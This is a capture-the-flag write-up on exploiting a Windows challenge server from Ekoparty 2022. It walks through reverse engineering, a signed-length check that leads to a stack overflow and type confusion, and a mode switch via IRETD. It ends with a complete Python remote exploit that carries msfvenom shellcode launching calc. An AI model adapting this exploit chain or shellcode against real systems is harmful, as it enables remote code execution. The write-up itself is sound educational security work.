Last month, during Ekoparty, Blue Frost Security published a Windows challenge. Windows exploitation challenges are rare in CTFs, and I found this one interesting and very clever, so I decided to write about my reverse engineering and exploitation methodology.
You can download the target application here (backup).
When exploring an unknown executable, one of the first things I always check is which security features were built into the binary at compile time. On Linux I'm used to checksec.sh; on Windows I use winchecksec or PESecurity. They aren't actively maintained, but they serve our purpose.
Running winchecksec reported the following mitigations:
C:\Users\VoidSec>winchecksec.exe bfs-eko2022.exe
Architecture : AMD64
Dynamic Base : "Present"
ASLR : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation : "Present"
NX/DEP : "Present"
SEH : N/A
CFG : "NotPresent"
RFG : "NotPresent"
SafeSEH : N/A
GS : "Present"
Authenticode : False
.NET : False
Some of these details can also be confirmed at runtime with a tool like System Informer (formerly Process Hacker):
This means that we are dealing with an x64, unobfuscated, compiled C++ binary (the compiler was identified with DIE). ASLR, DEP and stack canaries (GS) are enabled, but CFG is not.
Once executed, the binary binds to 0.0.0.0, port 31415, and waits for a client connection.
As per my methodology, I reverse engineered the high-level functionality of each code block and renamed each block with a meaningful label. Colouring blocks also helps me visualize the code flow:
I then collapsed all irrelevant nodes, which left the following simplified code graph:
I usually combine debugging and static code analysis to get the most out of both. I also wrote a simple Python “client” to interact with the target.
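As soon as the software starts, a buffer that is always static (both in size and memory address) is allocated. I'll call it the heap-buffer, although, strictly speaking, VirtualAlloc() maps pages directly rather than going through the process heap: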
As we can see from the VirtualAlloc() API call above, the buffer is allocated at address 0x10000000 and its size is 0x1000 (4096 bytes). The memory protection for the region is RWX.
After that come the socket initialization and the server binding. The program then enters a loop and waits for a client connection.
Note: the server is not multithreaded, and only one client at a time is allowed.
Data sent to the server is stored in the previously allocated heap-buffer, and then a function is called. I've renamed this function handhshake_check(). It has the prototype handhshake_check(uint buffer_length, char *buffer) and decompiles to the following code:
_BOOL8 __fastcall handhshake_check(__int64 buffer_length, const char *buffer)
{
  return strncmp(buffer, Str2, 6ui64) == 0;
}
This function checks whether the first 6 bytes of our buffer match the string “Hello\x00”. If they do, execution continues and the server sends back “Hi\x00”.
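The check can be made concrete with a small Python model. This assumes that Str2 holds the NUL-terminated string "Hello", as the handshake the exploit sends suggests. strncmp_equal() and handshake_ok() are hypothetical helpers that mimic strncmp()'s stop-at-NUL behaviour; they are not code taken from the target. Because the comparison covers 6 bytes, the terminator is part of what has to match.

```python
def strncmp_equal(a: bytes, b: bytes, n: int) -> bool:
    """True when strncmp(a, b, n) == 0; bytes past the end are treated as NUL (assumption)."""
    for i in range(n):
        ca = a[i] if i < len(a) else 0
        cb = b[i] if i < len(b) else 0
        if ca != cb:
            return False
        if ca == 0:  # both strings ended at the same position
            return True
    return True


# Assumption: Str2 is "Hello" plus its terminator, i.e. 6 bytes.
STR2 = b"Hello\x00"


def handshake_ok(buffer: bytes) -> bool:
    """Hypothetical model of handhshake_check(): compare at most 6 bytes."""
    return strncmp_equal(buffer, STR2, 6)


if __name__ == "__main__":
    print(handshake_ok(b"Hello\x00"))  # what the exploit sends
    print(handshake_ok(b"Hello!"))     # 6th byte must be the terminator
```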
After that, the execution flow is transferred to another function, which I've renamed data_processing(). It decompiles as follows:
int __fastcall data_processing(SOCKET socket)
{
  int result; // eax
  int v2; // eax
  unsigned int i; // [rsp+20h] [rbp-F48h]
  unsigned int header_len; // [rsp+24h] [rbp-F44h]
  unsigned int len_0; // [rsp+24h] [rbp-F44h]
  CHAR CmdLine[3840]; // [rsp+30h] [rbp-F38h] BYREF
  char packet_type; // [rsp+F30h] [rbp-38h]
  char stack_buff[8]; // [rsp+F40h] [rbp-28h] BYREF
  char packet_type_0; // [rsp+F48h] [rbp-20h]
  unsigned __int16 packet_data_length; // [rsp+F49h] [rbp-1Fh]

  for ( i = 0; i < 0x1000; i += 16 )
  {
    *(_QWORD *)&heap_buff[i] = 0x5050505050505050i64;
    *(_QWORD *)&heap_buff[i + 8] = 0xCF58585858585858ui64;
  }
  printf(" [+] Processing request\n");
  header_len = recv(socket, stack_buff, 11, 0);
  if ( header_len == -1 )
    return printf(" [-] Client data error\n");
  if ( header_len < 11ui64 )
    return printf(" [-] Bad size\n");
  if ( *(_QWORD *)stack_buff != '2202okE' )
    return printf(" [-] Wrong cookie value\n");
  packet_type = packet_type_0;
  if ( packet_type_0 != 'T' )
    return printf(" [-] Invalid packet type\n");
  if ( (__int16)packet_data_length > 3840 ) // Integer Overflow
    return printf(" [-] Invalid packet size\n");
  len_0 = recv(socket, heap_buff, packet_data_length, 0);// writing packet_data to heap-buffer
  printf(" [+] Data received: %i bytes\n", len_0);
  char_replace(CmdLine, heap_buff, len_0);
  if ( packet_type == 'T' )
  {
    printf(" [+] Message received: %s\n", CmdLine);
    send(socket, CmdLine, len_0, 0);
  }
  else
  {
    printf(" [-] Unsupported message\n");
    v2 = strlen(Str);
    send(socket, buf, v2 + 1, 0);
  }
  result = packet_type;
  if ( packet_type == 'X' )
  {
    off_7FF720E1C000 = (__int64 (__fastcall *)(_QWORD))&heap_buff[len_0];
    return off_7FF720E1C000(CmdLine);
  }
  return result;
}
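In this function:
- The heap-buffer is initialized by repeating the two QWORDs 0x5050505050505050 and 0xCF58585858585858.
- 11 bytes of header are received into a stack buffer. The receive must not fail (-1) and must return at least 11 bytes.
- The first 8 bytes (the cookie) must be equal to 0x323230326F6B45 (“Eko2022”).
- The 9th byte must be the T character. This field is used to determine the packet's type.
- The last 2 bytes (the packet data length) must not be greater than 0xF00 (3840 bytes).
I've named this structure packet_header: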
#pragma pack(push, 1) // no padding: the header is exactly 11 bytes
struct packet_header { CHAR cookie_value[8]; BYTE packet_type; SHORT packet_data_len; };
#pragma pack(pop)
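The 11-byte layout can be checked with Python's struct module. The `<` prefix selects little-endian with no alignment padding, which matches the packed layout above. The `h` code mirrors the signed SHORT length, so passing -1 yields the \xFF\xFF bytes used later. build_header() and parse_header() are hypothetical helper names for this sketch.

```python
import struct

# little-endian, no padding: 8-byte cookie, 1-byte type, signed 16-bit length
HEADER_FMT = "<8sch"


def build_header(packet_type: bytes, data_len: int) -> bytes:
    """Pack a packet_header; data_len is signed, like packet_data_len."""
    return struct.pack(HEADER_FMT, b"Eko2022\x00", packet_type, data_len)


def parse_header(raw: bytes):
    """Unpack (cookie, type, length) from an 11-byte header."""
    return struct.unpack(HEADER_FMT, raw)


if __name__ == "__main__":
    hdr = build_header(b"T", 0x0F00)
    print(struct.calcsize(HEADER_FMT), hdr.hex())
    # The cookie read as a little-endian QWORD is the constant IDA shows
    print(hex(int.from_bytes(b"Eko2022\x00", "little")))
```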
After our packet's header passes all the above validations, the server waits for the packet's data. This data (packet_data) is saved in the previously allocated heap-buffer.
char_replace()
Next, a function that I've renamed char_replace() is called. It copies the content of packet_data (stored in the heap-buffer) to a stack buffer (CmdLine) of size 0xF00 (3840 bytes). While copying the data, it replaces every occurrence of the bytes 0x2B and 0x33 with null bytes.
__int64 __fastcall char_replace(_BYTE *CmdLine, _BYTE *heap_buffer, unsigned int size)
{
  __int64 result; // rax
  unsigned int i; // [rsp+0h] [rbp-18h]

  for ( i = 0; ; ++i )
  {
    result = size;
    if ( i >= size )
      break;
    if ( *heap_buffer == 0x2B || *heap_buffer == 0x33 )
      *CmdLine = 0;
    else
      *CmdLine = *heap_buffer;
    ++heap_buffer;
    ++CmdLine;
  }
  return result;
}
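A Python model makes the filtering easy to reason about when building payloads. char_replace() below is a sketch of the decompiled loop. bad_offsets() is a hypothetical helper that flags bytes which would not survive the copy onto the stack. The real function writes into a fixed 3840-byte buffer without checking `size`, and this model simply returns the bytes that would be written.

```python
BAD_BYTES = {0x2B, 0x33}


def char_replace(heap_data: bytes, size: int) -> bytes:
    """Model of char_replace(): copy `size` bytes, writing NUL instead of 0x2B/0x33."""
    return bytes(0 if b in BAD_BYTES else b for b in heap_data[:size])


def bad_offsets(payload: bytes) -> list:
    """Offsets in `payload` whose value would be zeroed in the stack copy."""
    return [i for i, b in enumerate(payload) if b in BAD_BYTES]


if __name__ == "__main__":
    print(char_replace(b"\x23\x00\x2b\x00\x33\x41", 6).hex())
    print(bad_offsets(b"\x53\x2b\x00\x33"))
```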
After the copy and character replacement, the resulting data is sent back to the client.
The packet_data_len comparison (which IDA's decompiler fails to visualize adequately) is odd enough to investigate. As we can see from the raw assembly:
movsx eax, packet_data_length
cmp eax, 0F00h
jle short loc_7FF609B81386
The packet_data_len value is loaded into the EAX register by the MOVSX instruction.
MOVSX: copies the contents of the source operand to the destination operand and sign-extends the value. In 64-bit mode, the instruction's default operation size is 32 bits.
JLE: a conditional jump that follows a test. After a cmp, it jumps if the destination operand is less than or equal to the source operand, using a signed comparison.
If we send a packet_data_len of 0xFFFF, it is sign-extended to 0xFFFFFFFF. The signed comparison treats that as -1, which is less than 0xF00, so the value “bypasses” the length check.
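The bypass can be reproduced in a few lines of Python. struct's `h` (signed) and `H` (unsigned) 16-bit codes stand in for MOVSX and for the unsigned value later passed to recv(). The helper names are hypothetical.

```python
import struct

LIMIT = 0x0F00  # 3840, the size of CmdLine


def passes_length_check(raw_len: bytes) -> bool:
    """Mimic `movsx eax, ...; cmp eax, 0F00h; jle` on the 2-byte length field."""
    signed = struct.unpack("<h", raw_len)[0]  # MOVSX: sign-extend 16 -> 32 bits
    return signed <= LIMIT                     # JLE: signed comparison


def recv_length(raw_len: bytes) -> int:
    """recv() receives the same field as an unsigned 16-bit value."""
    return struct.unpack("<H", raw_len)[0]


if __name__ == "__main__":
    for raw in (b"\x00\x0f", b"\x01\x0f", b"\xff\xff"):
        print(raw.hex(), passes_length_check(raw), recv_length(raw))
```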
This “integer overflow” (more precisely, a signedness bug) leads directly to a stack-based buffer overflow. char_replace() copies the content of the heap-buffer (at address 0x10000000) onto the CmdLine[3840] buffer using len_0, the number of bytes actually received. Once the packet_header.packet_data_len check is bypassed, len_0 is no longer bounded by the size of CmdLine.
Before trashing the stack with our linear overflow, it is always better to check what's interesting on it. Inspecting with a debugger what's left on the stack after the CmdLine[3840] buffer reveals a few things:
- The CmdLine buffer (filled with A's up to its limit, so as not to trigger the stack-based buffer overflow yet).
- The packet_type local variable.
- The packet_header buffer we've previously sent to the server.
- The stack canary. The binary was compiled with the /GS flag, and before data_processing()'s epilogue we can see a call to the __security_check_cookie() function.
- The saved return address into the main() function.
Simply overwriting the saved return pointer is not a viable option. We would also overwrite the stack canary, and the process would be terminated.
Unfortunately, we do not have an information leak either. The send() function echoes back the content of the CmdLine buffer, but it does not use the packet_data_len value we control in the packet's header. It uses the number of packet_data bytes we actually sent (len_0).
We should definitely come up with something different.
As mentioned before, one of the interesting pieces of data left on the stack, sitting right after our buffer, is the packet_type local variable. This value is later used for the type-check comparisons:
if ( packet_type == 'T' )
{
  printf(" [+] Message received: %s\n", CmdLine);
  send(socket, CmdLine, len_0, 0);
}
else
{
  [--TRUNCATED--]
}
result = packet_type;
if ( packet_type == 'X' )
{
  [--TRUNCATED--]
}
return result;
Since we can overwrite its value (using the linear stack-based buffer overflow discovered earlier), we can cause a “type confusion” and end up in the X case.
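IDA's variable comments in data_processing() give the rbp-relative offsets. From these we can compute exactly which byte of the overflow lands on packet_type. The sketch below does that arithmetic. build_overflow() is a hypothetical helper. Keep in mind that every byte written this way passes through char_replace(), so 0x2B and 0x33 cannot be used here.

```python
# rbp-relative offsets from IDA's comments in data_processing()
CMDLINE_OFF = -0xF38
PACKET_TYPE_OFF = -0x38
STACK_BUFF_OFF = -0x28


def distance(from_off: int, to_off: int) -> int:
    """Bytes between two rbp-relative stack slots."""
    return to_off - from_off


def build_overflow(prefix: bytes, new_type: bytes = b"X") -> bytes:
    """Pad `prefix` up to packet_type and overwrite it with `new_type`."""
    pad = distance(CMDLINE_OFF, PACKET_TYPE_OFF)
    if len(prefix) > pad:
        raise ValueError("prefix does not fit in CmdLine")
    return prefix + b"A" * (pad - len(prefix)) + new_type


if __name__ == "__main__":
    print(distance(CMDLINE_OFF, PACKET_TYPE_OFF), distance(CMDLINE_OFF, STACK_BUFF_OFF))
```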
If we successfully trigger the type confusion, the program jumps directly into the heap-buffer, right past our packet_data. There, only the data written during the heap-buffer “initialization” (0x5050505050505050 and 0xCF58585858585858) remains.
These initialization bytes are not random; in fact, they disassemble to:
pop rax
pop rax
pop rax
pop rax
pop rax
pop rax
pop rax
iretd
push rax
push rax
push rax
push rax
push rax
push rax
push rax
push rax
Without any further modification, the software crashes with an Access Violation error on the iretd instruction.
Note: the execution flow always jumps into the heap-buffer right after the bytes we control. Because of that, we can neither “bypass” nor overwrite the iretd instruction.
If we really want to crack this challenge, we need to dive into the iretd instruction.
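The landing spot can be modelled by replaying the fill loop and placing our data at the start of the buffer. In the initialization pattern, 0x50 is push rax, 0x58 is pop rax and 0xCF is iretd. The sketch below (hypothetical helper names) returns the call target &heap_buff[len_0] and the bytes found there. With a packet_data length that is 8 modulo 16, such as the exploit's 3848 bytes, execution lands directly on the seven pop rax followed by iretd.

```python
HEAP_BASE = 0x10000000  # fixed VirtualAlloc() address
HEAP_SIZE = 0x1000


def init_heap() -> bytearray:
    """Replay data_processing()'s fill loop: two little-endian QWORDs per 16 bytes."""
    buf = bytearray()
    for _ in range(0, HEAP_SIZE, 16):
        buf += (0x5050505050505050).to_bytes(8, "little")
        buf += (0xCF58585858585858).to_bytes(8, "little")
    return buf


def landing(packet_data: bytes, window: int = 8):
    """Return the call target and the first `window` bytes executed there."""
    if len(packet_data) >= HEAP_SIZE:
        raise ValueError("packet_data must fit in the heap-buffer")
    heap = init_heap()
    heap[: len(packet_data)] = packet_data  # recv() overwrites the start of the buffer
    target = HEAP_BASE + len(packet_data)
    return target, bytes(heap[len(packet_data): len(packet_data) + window])


if __name__ == "__main__":
    target, code = landing(b"A" * 3848)  # same length as the exploit's packet_data
    print(hex(target), code.hex())
```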
iretd
Looking at the x86 Instruction Set Reference:
IRETD – interrupt return double (32-bit operand size): Returns program control from an exception or interrupt handler to a program that was interrupted by an exception, an external interrupt, or a software-generated interrupt. In Real-Address Mode, the IRET instruction performs a far return to the interrupted program. During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.
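Since we control the stack, we're only left with the task of crafting it in a way that gives us code execution. In 64-bit mode, IRET always pops the stack pointer and the stack segment selector as well. IRETD therefore expects the following values on the stack, listed from the highest address down to the current top of the stack (which holds EIP):
SS
ESP
EFLAGS
CS
EIP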
We can easily point EIP and ESP into the heap-buffer we control. I took the EFLAGS value from WinDbg:
- EIP: 0x10000014. This is the start of our heap-buffer plus an offset that skips the 20-byte IRETD frame, so we land directly at the beginning of our shellcode.
- ESP: 0x10000800. This is a “safe” place in the “middle” of our heap-buffer. It is not at the beginning, where the shellcode sits. It is not at the end either, so that stack usage does not spill outside the heap-buffer region and trigger access violation errors.
- EFLAGS: 0x246
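If you're wondering what 0x246 encodes, the sketch below decodes it against the standard EFLAGS bit positions. decode_eflags() is a hypothetical helper, and only the commonly used low flags are named. The value decodes to the always-set reserved bit 1, plus PF, ZF and IF (interrupts enabled), which is a typical user-mode EFLAGS value.

```python
# Standard x86 EFLAGS bit positions (low 12 bits only)
FLAG_NAMES = {
    0: "CF", 1: "reserved (always 1)", 2: "PF", 4: "AF", 6: "ZF",
    7: "SF", 8: "TF", 9: "IF", 10: "DF", 11: "OF",
}


def decode_eflags(value: int):
    """Return the names of the flags set in `value`, lowest bit first."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if (value >> bit) & 1]


if __name__ == "__main__":
    print(decode_eflags(0x246))
```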
SS and CS, on the other hand, were more difficult. They are used to index the Global Descriptor Table (GDT), which has descriptors for:
- 0x00: Null descriptor
- 0x10: Kernel code segment
- 0x18: Kernel data segment
- 0x20: User code segment (32-bit, compatibility mode)
- 0x28: User data segment
- 0x30: User code segment (64-bit)
We can explore them in a kernel-mode debugger, such as WinDbg, with the following commands:
0: kd> !process 0 0 bfs-eko2022.exe
PROCESS ffffe303936d7080
    SessionId: 1 Cid: 0b38 Peb: 00dd2000 ParentCid: 0e90
    DirBase: 119c67002 ObjectTable: ffffb48eed28d5c0 HandleCount: 52.
    Image: bfs-eko2022.exe

0: kd> .process /r /P ffffe303936d7080
Implicit process is now ffffe303`936d7080
.cache forcedecodeptes done
Loading User Symbols
........
0: kd> dd @gdtr
fffff804`1645afb0 00000000 00000000 00000000 00000000
fffff804`1645afc0 00000000 00209b00 00000000 00409300
fffff804`1645afd0 0000ffff 00cffb00 0000ffff 00cff300
fffff804`1645afe0 00000000 0020fb00 00000000 00000000
fffff804`1645aff0 90000067 16008b45 fffff804 00000000
fffff804`1645b000 00003c00 0040f300 00000000 00000000
fffff804`1645b010 00000000 00000000 00000000 00000000
fffff804`1645b020 00000000 00000000 00000000 00000000
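The raw dwords from the dd @gdtr dump can be decoded with a few shifts. This sketch assumes the standard legacy 8-byte descriptor layout described in the Intel SDM. decode_descriptor() and GDT_DUMP are hypothetical names. The 16-byte TSS at offset 0x40 is left out, because system descriptors are wider in 64-bit mode. The decoded values show that 0x20 is a 32-bit ring-3 code segment, 0x30 has the L (64-bit) bit set, and 0x50 is a ring-3 data segment with a limit of only 0x3C00 bytes.

```python
def decode_descriptor(low: int, high: int) -> dict:
    """Decode a legacy 8-byte GDT entry given as the two dwords printed by `dd`."""
    access = (high >> 8) & 0xFF
    flags = (high >> 20) & 0xF
    if not access & 0x10:
        kind = "system"  # S = 0: TSS, LDT, gates
    elif access & 0x08:
        kind = "code"
    else:
        kind = "data"
    return {
        "base": (low >> 16) | ((high & 0xFF) << 16) | (high & 0xFF000000),
        "limit": (low & 0xFFFF) | (((high >> 16) & 0xF) << 16),
        "present": bool(access & 0x80),
        "dpl": (access >> 5) & 0x3,
        "kind": kind,
        "long_mode": bool(flags & 0x2),      # L bit: 64-bit code segment
        "default_big": bool(flags & 0x4),    # D/B bit: 32-bit segment
        "page_granular": bool(flags & 0x8),  # G bit: limit counted in 4 KiB pages
    }


# (low, high) dwords copied from the `dd @gdtr` output, keyed by table offset
GDT_DUMP = {
    0x10: (0x00000000, 0x00209B00),
    0x18: (0x00000000, 0x00409300),
    0x20: (0x0000FFFF, 0x00CFFB00),
    0x28: (0x0000FFFF, 0x00CFF300),
    0x30: (0x00000000, 0x0020FB00),
    0x50: (0x00003C00, 0x0040F300),
}

if __name__ == "__main__":
    for offset, (low, high) in GDT_DUMP.items():
        print(hex(offset), decode_descriptor(low, high))
```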
The first 32 bytes (selectors 0x00 to 0x18, i.e. the null descriptor and the kernel descriptors) are “reserved” for the kernel. For user mode, we want to use selectors 0x20 and 0x28.
However, it's not quite that straightforward. Each descriptor is 8 bytes in size, so a descriptor's offset in the table is always a multiple of 8, and the three least significant bits of the selector are free. Intel uses bit 2 as the Table Indicator (0 for the GDT, 1 for the LDT) and bits 0 and 1 for the Requested Privilege Level (RPL). The RPL is zero when operating in ring-0 (kernel), but as we want to move to ring-3 (user mode), we must set it to 3.
This means that our code segment selector will be 0x20 | 0x3 = 0x23, and our data segment selector will be 0x28 | 0x3 = 0x2B.
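The selector arithmetic and the bad-byte problem can be expressed in a few lines. make_selector() and split_selector() are hypothetical helpers. BAD_BYTES is the set zeroed by char_replace() in the stack copy, which is where the IRETD frame lives. The sketch shows why 0x2B cannot be used as SS while 0x53 can.

```python
BAD_BYTES = {0x2B, 0x33}  # zeroed by char_replace() in the stack copy


def make_selector(table_offset: int, rpl: int, ldt: bool = False) -> int:
    """Selector = descriptor offset (multiple of 8) | TI bit | RPL."""
    if table_offset % 8:
        raise ValueError("descriptor offsets are multiples of 8")
    return table_offset | (0x4 if ldt else 0) | (rpl & 0x3)


def split_selector(selector: int):
    """Return (descriptor offset, uses LDT, RPL)."""
    return selector & ~0x7, bool(selector & 0x4), selector & 0x3


if __name__ == "__main__":
    for offset in (0x20, 0x28, 0x50):
        sel = make_selector(offset, 3)
        print(hex(sel), "bad byte" if sel in BAD_BYTES else "ok")
```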
The code selector poses no problem. The data selector, on the other hand, is one of the “bad bytes” replaced by the char_replace() function.
For the stack segment selector, we just need to find another value whose descriptor type is Data, RW. I looped through all the selectors and ended up with the value 0x53:
0: kd> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P  Nl 000004f3
- CS: 0x23, code segment selector
- SS: 0x53, stack segment selector
These settings pivot the execution flow to the beginning of our shellcode, but in 32-bit mode. Unfortunately, the stack base and limit are completely messed up: the 0x53 descriptor has a limit of only 0x3c00 bytes, while ESP points to 0x10000800. As a result, the program crashes as soon as we try to use the stack (e.g., PUSH EAX).
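The IRETD frame itself is just five little-endian dwords. If my reading of the frame offsets is right, IDA places CmdLine at rsp+0x30. The call into the heap-buffer then pushes 8 bytes, and the seven pop rax remove 0x38 bytes, so RSP points at the start of CmdLine when iretd executes. That is why the frame sits at the very beginning of packet_data. iretd_frame() is a hypothetical helper. Because the frame goes through the stack copy, it must not contain 0x2B or 0x33.

```python
import struct

HEAP_BASE = 0x10000000
BAD_BYTES = {0x2B, 0x33}  # zeroed by char_replace() in the stack copy


def iretd_frame(eip: int, cs: int, eflags: int, esp: int, ss: int) -> bytes:
    """Pack five 32-bit slots in the order IRETD pops them: EIP, CS, EFLAGS, ESP, SS."""
    return struct.pack("<5I", eip, cs, eflags, esp, ss)


frame = iretd_frame(
    eip=HEAP_BASE + 0x14,   # first byte after this 20-byte frame in the heap-buffer
    cs=0x23,                # GDT offset 0x20 | RPL 3
    eflags=0x246,
    esp=HEAP_BASE + 0x800,  # "safe" spot in the middle of the heap-buffer
    ss=0x53,                # GDT offset 0x50 | RPL 3
)

if __name__ == "__main__":
    print(len(frame), frame.hex())
```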
To execute our shellcode properly, I introduced the following “prologue” at its beginning: JMP 0x33:0x1000001c
This far jump lands a few bytes further into the prologue. It also lets us specify 0x33 (the 64-bit user code descriptor at GDT offset 0x30, with RPL 3) as the new code segment, which brings us back into 64-bit mode.
Note: if you're wondering why I'm allowed to use the 0x33 value, it is a “bad byte” only in the stack copy made by char_replace(). The shellcode lives in the heap-buffer, where it remains unaffected.
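The prologue bytes can be reproduced with struct. JMP ptr16:32 is opcode EA followed by a 32-bit offset and a 16-bit selector. This encoding is invalid in 64-bit mode and only decodes here because IRETD left the CPU in 32-bit compatibility mode. far_jmp_ptr16_32() is a hypothetical helper. The sketch also computes where the next prologue instruction (48 89 CC, mov rsp, rcx) begins.

```python
import struct


def far_jmp_ptr16_32(selector: int, offset: int) -> bytes:
    """Encode JMP ptr16:32: opcode EA, 32-bit offset, then 16-bit selector."""
    return b"\xea" + struct.pack("<IH", offset, selector)


SHELLCODE_START = 0x10000014  # EIP restored by IRETD
prologue = far_jmp_ptr16_32(0x33, 0x1000001C)
next_insn = SHELLCODE_START + len(prologue)  # where `48 89 CC` begins

if __name__ == "__main__":
    print(prologue.hex(), hex(next_insn))
```

When adapting the exploit, note that 0x1000001C is one byte past next_insn (0x1000001B). The CPU therefore skips the 0x48 REX.W prefix and executes 89 CC, i.e. mov esp, ecx, which zero-extends ECX into RSP. This restores the correct stack pointer only while the original stack sits below 4 GB. Jumping to 0x1000001B would execute the full mov rsp, rcx.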
Since 64-bit mode doesn't need a valid stack segment selector (SS is essentially ignored), we can finally restore the stack pointer to a meaningful value. Luckily, the RCX register still holds the address of CmdLine, passed as the first argument (per the x64 calling convention) when data_processing() called into our heap-buffer. RCX therefore points into the original stack, as it was before IRETD “polluted” it. We can transfer it back into RSP with: mov rsp, rcx.
With everything restored, we can execute the shellcode and finally pop calc!
The complete (and commented) exploit code, IDA’s DB and target binary are available on my GitHub.
import socket
import struct

"""
Exploit title: Ekoparty 2022 BFS Windows Challenge Exploit
Authors: Paolo Stagno aka VoidSec - [email protected] - https://voidsec.com
Grade: PoC
Date: 20/11/2022
Tested on: Windows 10 Pro x64 22H2 Build 19045.2251
Category: remote exploit
Platform: windows
"""

# msfvenom -a x64 --platform Windows -p windows/x64/exec cmd="calc" -f python -v shellcode
shellcode_x64 = b""
# shellcode_x64 += b"\xcc" # INT3
shellcode_x64 += b"\xea\x1c\x00\x00\x10\x33\x00"  # 32-bit shellcode prologue restoring the CS value to 0x33 - JMP 0x33:0x1000001c
shellcode_x64 += b"\x48\x89\xCC"  # 64-bit shellcode prologue restoring old stack pointer - MOV RSP, RCX
# shellcode_x64 += b"\xcc" # INT3
shellcode_x64 += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00"
shellcode_x64 += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2"
shellcode_x64 += b"\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
shellcode_x64 += b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7"
shellcode_x64 += b"\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c"
shellcode_x64 += b"\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
shellcode_x64 += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
shellcode_x64 += b"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88"
shellcode_x64 += b"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
shellcode_x64 += b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49"
shellcode_x64 += b"\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34"
shellcode_x64 += b"\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
shellcode_x64 += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
shellcode_x64 += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
shellcode_x64 += b"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
shellcode_x64 += b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49"
shellcode_x64 += b"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
shellcode_x64 += b"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
shellcode_x64 += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
shellcode_x64 += b"\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff"
shellcode_x64 += b"\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
shellcode_x64 += b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00"
shellcode_x64 += b"\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0"
shellcode_x64 += b"\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
shellcode_x64 += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80"
shellcode_x64 += b"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
shellcode_x64 += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
shellcode_x64 += b"\x63\x00"

print("Ekoparty 2022 - BFS' Windows Challenge")
print("> Exploit by VoidSec")

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", 31415))

handshake = b"Hello\x00"
print(f"[>] Sending handshake - {len(handshake)} bytes")
client.send(handshake)
resp = client.recv(3)
if resp == b"Hi\x00":
    print("[+] ACK")

    # Packet's Header
    header = b""
    header += b"Eko2022\x00"  # cookie
    header += b"T"  # packet type
    header += b"\xFF\xFF"  # packet size; leads to integer overflow
    print(f"Header size: {len(header)} bytes")

    # Packet's Data
    packet_data_size = 3840  # 0xF00
    packet_data = b""
    # IRETD STACK; switch from x64 to x32
    packet_data += struct.pack("<I", 0x10000014)  # EIP; start of our heap-buffer + offset to land into our shellcode
    packet_data += struct.pack("<I", 0x23)  # CS; selector for user mode
    packet_data += struct.pack("<I", 0x246)  # EFLAGS; taken from WinDbg
    packet_data += struct.pack("<I", 0x10000800)  # ESP; a "safe" place in the "middle" of our heap-buffer
    packet_data += struct.pack("<I", 0x53)  # SS; a value I've found while debugging. It is of type Data RW
    print(f"IRETD STACK size: {len(packet_data)} bytes")

    # SHELLCODE
    packet_data += shellcode_x64
    print(f"Shellcode size: {len(shellcode_x64)} bytes")
    packet_data += b"A" * (packet_data_size - len(packet_data))  # fill the buffer up to where we overwrite packet_type
    packet_data += b"X"  # type confusion
    packet_data += b"X" * 7  # disassembled into 'pop rax' as we must not "trash" the stack
    # print(packet_data)
    print(f"[>] Sending packet: {len(header + packet_data)} bytes")
    client.send(header + packet_data)
    resp = client.recv(20)
    if resp == b"Unsupported message\x00":
        print("[+] Type Confusion Triggered")
    else:
        print("[!] Type Confusion Error")
else:
    print("[!] Handshake Error")
client.close()